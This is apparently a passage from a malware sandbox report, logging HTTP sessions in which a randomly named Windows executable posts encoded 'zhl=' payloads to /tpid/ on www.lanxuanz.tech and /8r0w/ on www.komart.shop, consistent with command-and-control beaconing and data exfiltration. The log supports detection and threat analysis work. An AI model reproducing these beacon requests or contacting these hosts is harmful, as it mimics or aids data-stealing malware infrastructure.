                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 5, 2024 15:23:33.592297077 CET799OUTPOST /tpid/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.lanxuanz.tech
                                                                            Origin: http://www.lanxuanz.tech
                                                                            Connection: close
                                                                            Content-Length: 200
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Referer: http://www.lanxuanz.tech/tpid/
                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; SGH-T889 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                            Data Raw: 7a 68 6c 3d 54 6c 49 4e 6b 46 54 64 6c 6e 67 51 53 74 4e 2b 78 6a 56 55 39 37 58 35 4c 47 48 2f 4d 43 6a 65 74 44 70 35 32 75 74 46 31 51 2b 38 37 4f 6b 58 73 71 59 78 56 71 7a 53 6c 49 6e 77 75 48 6b 70 44 48 77 41 62 71 42 4f 35 4d 56 51 52 7a 45 64 68 57 6c 4a 49 73 62 4b 68 7a 33 59 69 69 54 57 5a 2b 43 51 2b 38 51 73 37 41 35 47 50 66 4e 74 4a 31 48 41 54 78 49 54 67 56 6f 72 4c 76 36 75 7a 54 5a 43 64 5a 39 43 66 63 62 35 72 6e 4e 7a 64 76 65 36 67 72 50 53 79 65 48 58 73 45 56 74 4d 48 34 6d 4e 73 6c 78 41 52 56 51 43 49 37 7a 6b 31 59 67 70 6d 45 32 48 7a 52 5a 73 76 77 62 57 41 3d 3d
                                                                            Data Ascii: zhl=TlINkFTdlngQStN+xjVU97X5LGH/MCjetDp52utF1Q+87OkXsqYxVqzSlInwuHkpDHwAbqBO5MVQRzEdhWlJIsbKhz3YiiTWZ+CQ+8Qs7A5GPfNtJ1HATxITgVorLv6uzTZCdZ9Cfcb5rnNzdve6grPSyeHXsEVtMH4mNslxARVQCI7zk1YgpmE2HzRZsvwbWA==
                                                                            Nov 5, 2024 15:23:34.284486055 CET1236INHTTP/1.1 404
                                                                            Server: ZGS
                                                                            Date: Tue, 05 Nov 2024 14:23:34 GMT
                                                                            Content-Type: text/html
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: zalb_8ae64e9492=cd858cf068bec389eea549b00143a3a9; Path=/
                                                                            Set-Cookie: csrfc=2c4ef1fb-bf6a-4674-b20c-13e13d83c5d4;path=/;priority=high
                                                                            Set-Cookie: _zcsr_tmp=2c4ef1fb-bf6a-4674-b20c-13e13d83c5d4;path=/;SameSite=Strict;priority=high
                                                                            Cache-Control: private,no-cache,no-store,max-age=0,must-revalidate
                                                                            Pragma: no-cache
                                                                            Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                                            vary: accept-encoding
                                                                            Content-Encoding: gzip
                                                                            Data Raw: 35 37 35 0d 0a 1f 8b 08 00 00 00 00 00 00 00 cc 58 5b 6f db 36 14 7e df af 60 15 b4 68 b1 28 92 25 2b 76 15 d9 c5 96 0c c5 9e 3a a0 03 86 0d 7b a1 25 ca 22 42 91 02 49 c7 4e 82 fd f7 1d 52 b2 ad 6b 93 f5 69 76 03 8b e2 b9 f1 7c df 39 24 9b bc b9 fb 72 fb fb 9f bf fd 82 0a 5d b2 f5 0f 49 fd 83 10 4a 0a 82 33 fb 64 06 25 d1 18 71 5c 92 95 23 c5 46 68 e5 a0 54 70 4d b8 5e 39 5c 50 9e 91 c3 25 e2 22 17 8c 89 bd 79 c2 32 2d e8 03 31 8f 8a d3 aa 22 da 41 de c9 9c a6 9a 91 f5 5f a2 10 89 57 3f 1f 67 18 e5 f7 48 3f 56 e0 48 93 83 f6 52 05 ae 24 61 2b 47 e9 47 46 54 41 8c a5 42 92 7c e5 78 7b b2 c9 21 0a f5 29 c7 25 65 8f ab 2f 15 e1 3f 7e c5 5c c5 73 df bf bc f6 7d e7 64 d7 6a 1f 47 f0 d9 88 ec f1 f9 3c 84 8f b1 e4 d6 86 62 c7 58 42 c6 92 73 89 14 fc b8 8a 48 9a df 0c 15 14 7d 22 f1 6c 56 1d ba 73 25 96 5b ca 63 1f de a3 ce 44 85 b3 8c f2 ed c8 cc 06 a7 f7 5b 29 76 3c 73 53 c1 84 8c 2f f2 c8 7c 5b 86 ff 39 3f 5e 69 51 dd 1a 31 f5 3c 61 25 46 6e 29 9e 5c 48 28 c1 d2 dd 4a 9c 51 80 eb 3d 23 b9 be 44 17 b9 3f [TRUNCATED]
                                                                            Data Ascii: 575X[o6~`h(%+v:{%"BINRkiv|9$r]IJ3d%q\#FhTpM^9\P%"y2-1"A_W?gH?VHR$a+GGFTAB|x{!)%e/?~\s}djG<bXBsH}"lVs%[cD[)v<sS/|[9?^iQ1<a%Fn)\H(JQ=#D?_Euu,Xyo?LSt7Ba6%?DvL1)R{7V</fKOsN{vPc}0@J0|-NeNt$E+Ca^uK0gE,0][`Zn~.^D %cT,#|K1{Q;,1oz&j5#ZIdZA@OXU0_Qcq&?!S
                                                                            Nov 5, 2024 15:23:34.284665108 CET729INData Raw: c4 9a 5a 58 38 05 97 29 f2 ef 81 e3 55 a0 be 94 ef ab 5a 00 f6 d9 e7 e9 9c c0 6c 7b 93 6b ab 67 c2 34 cd ba d3 f4 2c 34 dd c7 f4 f0 bb 68 4a df 6a 53 9e 8b 89 32 b1 09 9f 4f 97 da 49 1f 31 8a fa 36 da b0 5f 7f 03 32 c3 56 c0 ad 37 cd a8 02 6d 73
                                                                            Data Ascii: ZX8)UZl{kg4,4hJjS2OI16_2V7msr$0Njq{}7Mpa [^Xw7)fGL6n0WE5<5-VI0F#)514csjq\GQ=uwOS{<,GrK


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            6192.168.2.455659136.143.186.12804324C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 5, 2024 15:23:36.140371084 CET819OUTPOST /tpid/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.lanxuanz.tech
                                                                            Origin: http://www.lanxuanz.tech
                                                                            Connection: close
                                                                            Content-Length: 220
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Referer: http://www.lanxuanz.tech/tpid/
                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; SGH-T889 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                            Data Raw: 7a 68 6c 3d 54 6c 49 4e 6b 46 54 64 6c 6e 67 51 53 4e 64 2b 32 41 4e 55 37 62 58 36 56 57 48 2f 46 69 69 5a 74 43 56 35 32 73 42 56 30 6a 61 38 37 71 73 58 72 72 59 78 63 36 7a 53 76 6f 6d 37 77 33 6b 67 44 41 35 2f 62 75 42 4f 35 4d 42 51 52 79 30 64 68 42 35 4b 4f 38 62 49 36 6a 33 57 73 43 54 57 5a 2b 43 51 2b 34 78 35 37 45 56 47 50 73 46 74 59 6b 48 48 51 78 49 51 77 46 6f 72 63 66 36 69 7a 54 5a 61 64 59 67 66 66 66 6a 35 72 69 78 7a 64 2b 65 37 75 72 4f 34 2f 2b 47 58 67 55 45 41 4b 45 63 75 46 65 30 56 4f 7a 56 55 4f 75 71 70 31 45 35 33 37 6d 67 46 61 30 59 74 68 73 4e 53 4e 47 54 48 56 54 46 37 69 41 62 37 51 33 55 77 58 41 43 79 2f 59 30 3d
                                                                            Data Ascii: zhl=TlINkFTdlngQSNd+2ANU7bX6VWH/FiiZtCV52sBV0ja87qsXrrYxc6zSvom7w3kgDA5/buBO5MBQRy0dhB5KO8bI6j3WsCTWZ+CQ+4x57EVGPsFtYkHHQxIQwForcf6izTZadYgfffj5rixzd+e7urO4/+GXgUEAKEcuFe0VOzVUOuqp1E537mgFa0YthsNSNGTHVTF7iAb7Q3UwXACy/Y0=
                                                                            Nov 5, 2024 15:23:36.827424049 CET1236INHTTP/1.1 404
                                                                            Server: ZGS
                                                                            Date: Tue, 05 Nov 2024 14:23:36 GMT
                                                                            Content-Type: text/html
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: zalb_8ae64e9492=cd858cf068bec389eea549b00143a3a9; Path=/
                                                                            Set-Cookie: csrfc=9780d1fe-a7d0-463a-9859-349853744ce5;path=/;priority=high
                                                                            Set-Cookie: _zcsr_tmp=9780d1fe-a7d0-463a-9859-349853744ce5;path=/;SameSite=Strict;priority=high
                                                                            Cache-Control: private,no-cache,no-store,max-age=0,must-revalidate
                                                                            Pragma: no-cache
                                                                            Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                                            vary: accept-encoding
                                                                            Content-Encoding: gzip
                                                                            Data Raw: 35 37 35 0d 0a 1f 8b 08 00 00 00 00 00 00 00 cc 58 5b 6f db 36 14 7e df af 60 15 b4 68 b1 28 92 25 2b 76 15 d9 c5 96 0c c5 9e 3a a0 03 86 0d 7b a1 25 ca 22 42 91 02 49 c7 4e 82 fd f7 1d 52 b2 ad 6b 93 f5 69 76 03 8b e2 b9 f1 7c df 39 24 9b bc b9 fb 72 fb fb 9f bf fd 82 0a 5d b2 f5 0f 49 fd 83 10 4a 0a 82 33 fb 64 06 25 d1 18 71 5c 92 95 23 c5 46 68 e5 a0 54 70 4d b8 5e 39 5c 50 9e 91 c3 25 e2 22 17 8c 89 bd 79 c2 32 2d e8 03 31 8f 8a d3 aa 22 da 41 de c9 9c a6 9a 91 f5 5f a2 10 89 57 3f 1f 67 18 e5 f7 48 3f 56 e0 48 93 83 f6 52 05 ae 24 61 2b 47 e9 47 46 54 41 8c a5 42 92 7c e5 78 7b b2 c9 21 0a f5 29 c7 25 65 8f ab 2f 15 e1 3f 7e c5 5c c5 73 df bf bc f6 7d e7 64 d7 6a 1f 47 f0 d9 88 ec f1 f9 3c 84 8f b1 e4 d6 86 62 c7 58 42 c6 92 73 89 14 fc b8 8a 48 9a df 0c 15 14 7d 22 f1 6c 56 1d ba 73 25 96 5b ca 63 1f de a3 ce 44 85 b3 8c f2 ed c8 cc 06 a7 f7 5b 29 76 3c 73 53 c1 84 8c 2f f2 c8 7c 5b 86 ff 39 3f 5e 69 51 dd 1a 31 f5 3c 61 25 46 6e 29 9e 5c 48 28 c1 d2 dd 4a 9c 51 80 eb 3d 23 b9 be 44 17 b9 3f [TRUNCATED]
                                                                            Data Ascii: 575X[o6~`h(%+v:{%"BINRkiv|9$r]IJ3d%q\#FhTpM^9\P%"y2-1"A_W?gH?VHR$a+GGFTAB|x{!)%e/?~\s}djG<bXBsH}"lVs%[cD[)v<sS/|[9?^iQ1<a%Fn)\H(JQ=#D?_Euu,Xyo?LSt7Ba6%?DvL1)R{7V</fKOsN{vPc}0@J0|-NeNt$E+Ca^uK0gE,0][`Zn~.^D %cT,#|K1{Q;,1oz&j5#ZIdZA@OXU0_Qcq&?!S
                                                                            Nov 5, 2024 15:23:36.827519894 CET729INData Raw: c4 9a 5a 58 38 05 97 29 f2 ef 81 e3 55 a0 be 94 ef ab 5a 00 f6 d9 e7 e9 9c c0 6c 7b 93 6b ab 67 c2 34 cd ba d3 f4 2c 34 dd c7 f4 f0 bb 68 4a df 6a 53 9e 8b 89 32 b1 09 9f 4f 97 da 49 1f 31 8a fa 36 da b0 5f 7f 03 32 c3 56 c0 ad 37 cd a8 02 6d 73
                                                                            Data Ascii: ZX8)UZl{kg4,4hJjS2OI16_2V7msr$0Njq{}7Mpa [^Xw7)fGL6n0WE5<5-VI0F#)514csjq\GQ=uwOS{<,GrK


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            7192.168.2.455674136.143.186.12804324C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 5, 2024 15:23:38.686458111 CET10901OUTPOST /tpid/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.lanxuanz.tech
                                                                            Origin: http://www.lanxuanz.tech
                                                                            Connection: close
                                                                            Content-Length: 10300
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Referer: http://www.lanxuanz.tech/tpid/
                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; SGH-T889 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                            Data Raw: 7a 68 6c 3d 54 6c 49 4e 6b 46 54 64 6c 6e 67 51 53 4e 64 2b 32 41 4e 55 37 62 58 36 56 57 48 2f 46 69 69 5a 74 43 56 35 32 73 42 56 30 6a 53 38 37 64 73 58 72 4d 45 78 47 36 7a 53 6a 49 6e 38 77 33 6c 67 44 42 64 7a 62 75 46 42 35 50 35 51 52 51 38 64 77 6c 4e 4b 41 38 62 49 7a 44 33 62 69 69 53 4d 5a 34 69 63 2b 38 56 35 37 45 56 47 50 71 68 74 59 31 48 48 57 78 49 54 67 56 6f 76 4c 76 37 31 7a 58 4e 6b 64 59 6b 50 66 75 44 35 71 43 42 7a 4f 63 6d 37 6d 72 50 65 38 2b 47 35 67 55 49 44 4b 45 42 56 46 66 78 77 4f 78 4a 55 59 49 44 66 69 41 74 63 67 58 77 2b 47 44 34 7a 69 65 64 49 55 6e 6e 74 63 78 39 66 67 30 58 59 4e 6c 35 6a 46 6c 57 71 69 63 78 31 76 53 66 74 48 54 38 53 5a 62 76 70 41 74 44 67 4e 62 6b 56 46 4d 44 77 68 43 37 4c 75 56 33 55 47 79 2f 4e 36 2f 71 42 77 6b 59 31 30 4b 59 6e 45 34 69 76 2b 49 62 6e 4e 30 46 70 53 75 75 50 77 31 30 74 6b 6b 46 4d 53 6a 2f 48 6f 4a 6b 6a 67 63 61 63 75 6c 39 52 6f 2f 33 77 46 71 34 47 30 49 4e 2b 6f 32 58 62 6e 44 42 6d 43 47 4f 69 51 4a 61 4a 53 77 [TRUNCATED]
                                                                            Data Ascii: zhl=TlINkFTdlngQSNd+2ANU7bX6VWH/FiiZtCV52sBV0jS87dsXrMExG6zSjIn8w3lgDBdzbuFB5P5QRQ8dwlNKA8bIzD3biiSMZ4ic+8V57EVGPqhtY1HHWxITgVovLv71zXNkdYkPfuD5qCBzOcm7mrPe8+G5gUIDKEBVFfxwOxJUYIDfiAtcgXw+GD4ziedIUnntcx9fg0XYNl5jFlWqicx1vSftHT8SZbvpAtDgNbkVFMDwhC7LuV3UGy/N6/qBwkY10KYnE4iv+IbnN0FpSuuPw10tkkFMSj/HoJkjgcacul9Ro/3wFq4G0IN+o2XbnDBmCGOiQJaJSw9MAVBwR7fXSIf/+797udDTKpQ2cQj1X9EflQIeXyhAGM38FhelxC5BhlK2RjHbeDDRm2HOCpepgpqYhQ93PEl1nEZX9MZdVGSTwHaHplVitT5MKEi8sZyVhhX1ZU75s1l06Pl4pQudCLsCNMwoX93QajvlB2NFJTnqNsL1n0oJHjRpWhdEM+YgaYQJkZrjcAYJQIJ7B60zwlqfETRIMgkU0O4boXyZqpJBCRzZ5uujtuBNB64Oh07hRtZ0/VSHGPw/aQWouH4kPuFPKX0SGAnmff8RhryrwlrvjQVTSrXHvAJetj63ZfJX/d1i4VIsskYBo/UR+VWHErS1u3c2BKat3BNyIjlnoxrIi6gFg369/tY8XlHqgrUbOiGdvIXFCUtET76M9n7ZBMMCiaynC+pRksqy9nYT0Fjpj720sxGZOMriPswKnXjaEwMAQ4Tx2iLJ8RfBxqhS62yuFtitGL1nA9DoYkGGLGIhZg7da7XUrz71b3fYHruT/arH1gMOtu67TE/Fs/Zk5hVREoxDHuMj84s6ZHilmXmEw+Y1tWxUvoERN8IVzBk8rREzObrgI976z4Z0SyHzOHzM1TXoEzwBn9KhAaLx3KCRJuvjgBZ4slM/52qONrQCiu8baNKp8XeYtVINyrJ+a9hK6GwOxDBZvFrOgczILzUZ [TRUNCATED]
                                                                            Nov 5, 2024 15:23:39.363715887 CET549INHTTP/1.1 400
                                                                            Server: ZGS
                                                                            Date: Tue, 05 Nov 2024 14:23:39 GMT
                                                                            Content-Type: text/html;charset=ISO-8859-1
                                                                            Content-Length: 80
                                                                            Connection: close
                                                                            Set-Cookie: zalb_8ae64e9492=4f8d155d92baa51fc002217e6d409cd9; Path=/
                                                                            Set-Cookie: csrfc=07eae607-9156-47e8-9858-eaa4689a5da1;path=/;priority=high
                                                                            Set-Cookie: _zcsr_tmp=07eae607-9156-47e8-9858-eaa4689a5da1;path=/;SameSite=Strict;priority=high
                                                                            Set-Cookie: JSESSIONID=18168AA369B9EDA86F788F446CB4FB65; Path=/; HttpOnly
                                                                            Data Raw: 7b 22 72 65 73 70 6f 6e 73 65 5f 63 6f 64 65 22 3a 22 34 30 30 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 22 31 22 2c 22 64 65 76 65 6c 6f 70 65 72 5f 6d 65 73 73 61 67 65 22 3a 22 49 6e 76 61 6c 69 64 20 69 6e 70 75 74 2e 22 7d 0a 0a
                                                                            Data Ascii: {"response_code":"400","status_code":"1","developer_message":"Invalid input."}


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            8192.168.2.455686136.143.186.12804324C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 5, 2024 15:23:41.230813980 CET538OUTGET /tpid/?zhl=engtnyTNtTQDWNNE7yJ78I7feV66GlGe8mJE780+4T661tYAjJ0+Tu/RlOqq0mFfSRMDbaNY7odrQC55001RANar5S3nmyGvU4LO7et061dPBL96f2mSZAk=&X8Rx1=znhhIbB8nN HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Host: www.lanxuanz.tech
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; SGH-T889 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                            Nov 5, 2024 15:23:41.940274954 CET1236INHTTP/1.1 404
                                                                            Server: ZGS
                                                                            Date: Tue, 05 Nov 2024 14:23:41 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 4641
                                                                            Connection: close
                                                                            Set-Cookie: zalb_8ae64e9492=aa11b5b9d2a4fd36a1a24567047ff52b; Path=/
                                                                            Set-Cookie: csrfc=864dc8b1-6db8-4994-a727-64d630b9063c;path=/;priority=high
                                                                            Set-Cookie: _zcsr_tmp=864dc8b1-6db8-4994-a727-64d630b9063c;path=/;SameSite=Strict;priority=high
                                                                            Cache-Control: private,no-cache,no-store,max-age=0,must-revalidate
                                                                            Pragma: no-cache
                                                                            Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                                            vary: accept-encoding
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 2c 20 6e 6f 61 72 63 68 69 76 65 2c 20 6e 6f 73 6e 69 70 70 65 74 22 20 2f 3e 0a 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 5a 6f 68 6f 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 77 65 62 66 6f 6e 74 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 36 30 30 22 3e 0a 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 4f 70 65 6e 20 53 61 6e 73 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 31 70 78 3b 0a 20 20 20 20 20 20 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html><html> <head> <meta name="robots" content="noindex, nofollow, noarchive, nosnippet" /> <title>Zoho</title> <link type="text/css" rel="stylesheet" href="/webfonts?family=Open+Sans:400,600"> <style> body{ font-family:"Open Sans", sans-serif; font-size:11px; margin:0px; padding:0px; background-color:#f5f5f5; } .topColors{ background: -moz-linear-gradient(left, #f0473d 0%, #f0473d 25%, #049735 25%, #049735 50%, #0086d5 50%, #0086d5 75%, #fdc000 75%,#fdc000 100%); background: -webkit-linear-gradient(left, #f0473d 0%, #f0473d 25%, #049735 25%, #049735 50
                                                                            Nov 5, 2024 15:23:41.940345049 CET212INData Raw: 25 2c 20 23 30 30 38 36 64 35 20 35 30 25 2c 20 23 30 30 38 36 64 35 20 37 35 25 2c 20 23 66 64 63 30 30 30 20 37 35 25 2c 23 66 64 63 30 30 30 20 31 30 30 25 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a
                                                                            Data Ascii: %, #0086d5 50%, #0086d5 75%, #fdc000 75%,#fdc000 100%); background-size:452px auto;height:3px; } .mainContainer{ width:1000px; margin:0px auto; }
                                                                            Nov 5, 2024 15:23:41.940356016 CET1236INData Raw: 20 20 20 20 20 20 2e 6c 6f 67 6f 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 33 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 31 38 70 78 20 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 7d 0a
                                                                            Data Ascii: .logo{ margin-top:3px; padding:18px 0px; } .content{ background-color:#fff; border-radius:4px; border-left:1px solid #e9e9e9; border-right:1px soli
                                                                            Nov 5, 2024 15:23:41.940645933 CET1236INData Raw: 0a 20 20 20 20 20 20 20 20 20 2e 64 6f 6d 61 69 6e 2d 63 6f 6c 6f 72 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 23 30 30 38 36 44 35 3b 20 0a 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 2e 6d 61 69 6e 2d 69 6e
                                                                            Data Ascii: .domain-color{ color:#0086D5; } .main-info{ margin-top: 40px; } .main-info li { font-size: 16px; padding: 10px 0; list-style:no
                                                                            Nov 5, 2024 15:23:41.940660000 CET1236INData Raw: 61 74 69 76 65 3b 0a 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 6f 70 43 6f 6c 6f 72 73 22
                                                                            Data Ascii: ative; } </style> </head> <body> <div class="topColors"></div> <div class="mainContainer"> <div class="logo"><img src="https://contacts.zoho.com/static/file?t=org&ID=456089&fs=thumb" alt="Zoho"></div>
                                                                            Nov 5, 2024 15:23:41.940670967 CET11INData Raw: 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: y></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            9192.168.2.455722133.130.35.90804324C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 5, 2024 15:23:47.544778109 CET793OUTPOST /8r0w/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.komart.shop
                                                                            Origin: http://www.komart.shop
                                                                            Connection: close
                                                                            Content-Length: 200
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Referer: http://www.komart.shop/8r0w/
                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; SGH-T889 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                            Data Raw: 7a 68 6c 3d 51 78 6a 48 71 49 36 6b 75 67 39 74 52 2f 71 38 36 72 45 77 59 31 6b 43 45 56 4d 67 46 36 77 76 76 6b 78 79 66 4b 36 47 32 67 39 70 72 71 6f 44 2b 33 33 59 56 71 72 49 35 52 76 37 45 6d 6d 32 72 5a 33 4f 2f 50 71 59 37 55 75 75 73 71 57 69 39 41 70 6d 44 4b 4a 58 35 42 56 73 77 70 65 7a 4a 68 76 71 6a 32 4b 36 46 6f 4a 37 55 63 2f 54 42 71 55 57 35 4f 6b 74 58 34 39 66 78 6d 56 78 47 78 6a 5a 6c 74 51 57 62 55 33 57 52 42 52 37 6f 4b 67 4f 4e 70 55 46 61 41 37 38 43 64 76 63 68 4a 6f 72 65 73 32 63 6c 4c 38 47 47 36 71 51 41 43 56 2b 33 4a 51 6c 72 4e 79 54 56 48 42 6a 4c 67 3d 3d
                                                                            Data Ascii: zhl=QxjHqI6kug9tR/q86rEwY1kCEVMgF6wvvkxyfK6G2g9prqoD+33YVqrI5Rv7Emm2rZ3O/PqY7UuusqWi9ApmDKJX5BVswpezJhvqj2K6FoJ7Uc/TBqUW5OktX49fxmVxGxjZltQWbU3WRBR7oKgONpUFaA78CdvchJores2clL8GG6qQACV+3JQlrNyTVHBjLg==
                                                                            Nov 5, 2024 15:23:48.412935972 CET668INHTTP/1.1 404 Not Found
                                                                            content-encoding: gzip
                                                                            content-type: text/html
                                                                            date: Tue, 05 Nov 2024 14:23:48 GMT
                                                                            etag: W/"67231618-2b5"
                                                                            server: nginx
                                                                            vary: Accept-Encoding
                                                                            content-length: 454
                                                                            connection: close
                                                                            Data Raw: 1f 8b 08 00 00 00 00 00 04 03 75 92 bd 6e 14 31 10 c7 fb 7b 0a e3 2a 91 b2 e7 43 29 63 6f 03 d4 49 71 0d d5 c9 f1 4e 6e 1d bc de c5 9e bb 70 42 3c cc 29 bb 4f 40 91 e3 43 91 20 a2 40 48 50 82 28 a0 42 3c 00 05 2d f6 7a 57 80 10 6e ec d9 f9 cf 6f be 96 df ba 7b 7c 67 7e ff e4 1e 29 b1 32 f9 84 c7 8b 18 69 97 82 9e 4b 1a 3f 80 2c f2 09 21 1c 35 1a c8 db a7 ed fb ee f3 f6 65 b7 6b 3f bc de 3d ff da 5e b5 5f da 17 ed 0f ce 92 3f 2a 2b 40 19 78 d8 64 f0 70 a5 d7 82 aa da 22 58 cc 70 d3 00 25 83 25 28 c2 23 64 31 e1 11 51 a5 74 1e 50 c0 4a 65 e7 0d 25 ac 4f d9 83 ac ac 40 d0 b5 86 8b a6 76 f8 47 f8 85 2e b0 14 05 ac b5 82 ac 37 0e 88 b6 1a b5 34 99 57 d2 80 b8 3d 9d 85 16 42 45 46 db 07 c4 81 11 d4 e3 c6 80 2f 01 02 a9 74 70 26 28 53 de 33 70 ae 76 d3 f0 8a 2d b3 d4 33 3f ad 8b 4d 30 0b bd 26 ca 48 ef 05 0d 1d 45 61 82 ea 6a 49 bc 53 81 10 5e 89 30 70 1a bb a4 44 1a 14 34 94 fb 57 e4 62 a1 2b b9 84 04 f8 17 bc 58 54 e0 fd 28 08 85 37 b1 fc 78 fe 37 f7 ed 25 3f 75 a3 e8 70 f6 f6 66 f7 ad 7d d7 5d 75 df bb [TRUNCATED]
                                                                            Data Ascii: un1{*C)coIqNnpB<)O@C @HP(B<-zWno{|g~)2iK?,!5ek?=^_?*+@xdp"Xp%%(#d1QtPJe%O@vG.74W=BEF/tp&(S3pv-3?M0&HEajIS^0pD4Wb+XT(7x7%?upf}]uOo_l{84OR(g2BqB"n+WG}z@g*{bLdtLQ$$|k


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            10192.168.2.455729133.130.35.90804324C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe
                                                                            TimestampBytes transferredDirectionData
